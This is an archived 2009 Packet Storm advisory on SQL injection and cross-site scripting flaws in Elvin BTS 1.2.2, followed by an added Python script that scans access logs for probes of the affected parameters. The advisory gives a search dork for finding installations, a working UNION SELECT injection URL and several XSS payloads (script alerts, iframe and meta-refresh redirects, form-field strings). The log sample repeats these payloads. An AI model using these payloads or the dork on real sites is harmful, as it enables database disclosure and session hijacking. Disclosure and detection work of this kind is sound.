Elvin BTS 1.2.2 SQL Injection / XSS

2009-07-08T00:00:00
ID PACKETSTORM:79002
Type packetstorm
Reporter 599eme Man
Modified 2009-07-08T00:00:00

Description

                                        
                                            `  
)-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=(  
( [-] Elvin BTS 1.2.2 Multiple Remote Vulnerabilities )  
) [-] Official SITE : http://www.elvinbts.org/ (  
( [-] Dork : Powered by Elvin Bug Tracking Server. )  
)--------------------------------------------------------------(  
( [-] Discovered By 599eme Man )  
) [-] Flouf@live.fr (  
( [-] BIG THANKS TO : Moudi ;) )  
)--------------------------------------------------------------(  
(-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=)  
  
  
[+] -- Bug SQL --  
  
http://landfill.elvinbts.org/show_activity.php?id=sql  
  
  
Demo:  
  
http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--  
  
  
  
[+] -- Bug XSS ( iframe - redirect ) --  
  
http://landfill.elvinbts.org/buglist.php?component=xss  
  
http://landfill.elvinbts.org/buglist.php?priority=xss  
  
  
Demo:  
  
  
http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E  
  
http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E  
  
http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E  
  
http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E  
  
http://landfill.elvinbts.org/buglist.php?component=<meta http-equiv="Refresh" content="0; url=http://www.google.com">  
  
http://landfill.elvinbts.org/buglist.php?priority=<meta http-equiv="Refresh" content="0; url=http://www.google.com">  
  
  
username : "'><script>alert('xss')</script>  
email : "'><script>alert('xss')</script>  
pass : "'><script>alert('xss')</script>  
confirm pass : "'><script>alert('xss')</script>  
  
  
  
  
`
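
For sites running this version, the web server access log shows whether the parameters named above have been probed. The following is an added example, not part of the original advisory or of Elvin BTS: it flags a non-numeric id on show_activity.php and markup characters in component or priority on buglist.php, run here over constructed log lines; the combined log format and the assumption that id is an integer are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\']')

def is_numeric(value):
    return re.fullmatch(r"[0-9]+", value) is not None

def no_markup(value):
    return MARKUP_RE.search(value) is None

# Scripts and parameters named in the advisory, with the check each value must pass.
RULES = {
    "show_activity.php": {"id": is_numeric},  # assumption: id is an integer key
    "buglist.php": {"component": no_markup, "priority": no_markup},
}

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jul/2009:10:00:01 +0000] "GET /show_activity.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jul/2009:10:00:05 +0000] "GET /show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8-- HTTP/1.1" 200 4801',
    '192.0.2.10 - - [08/Jul/2009:10:00:09 +0000] "GET /buglist.php?component=core&priority=P1 HTTP/1.1" 200 9000',
    '198.51.100.7 - - [08/Jul/2009:10:00:12 +0000] "GET /buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 200 9100',
]

def scan_line(line):
    """Return (script, param, decoded_value) for each value that fails its check."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    rules = RULES.get(url.path.rsplit("/", 1)[-1], {})
    findings = []
    for param, values in parse_qs(url.query, keep_blank_values=True).items():
        check = rules.get(param)
        for value in values:
            if check and not check(value):
                findings.append((url.path, param, value))
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for a sequence of log lines."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in scan_line(line)]

if __name__ == "__main__":
    for lineno, (path, param, value) in scan(SAMPLE_LOG):
        print(f"line {lineno}: {path} {param}={value!r}")
```

The username, email and password fields listed in the advisory are form fields, so they will normally not appear in the query string and are not covered by this log check.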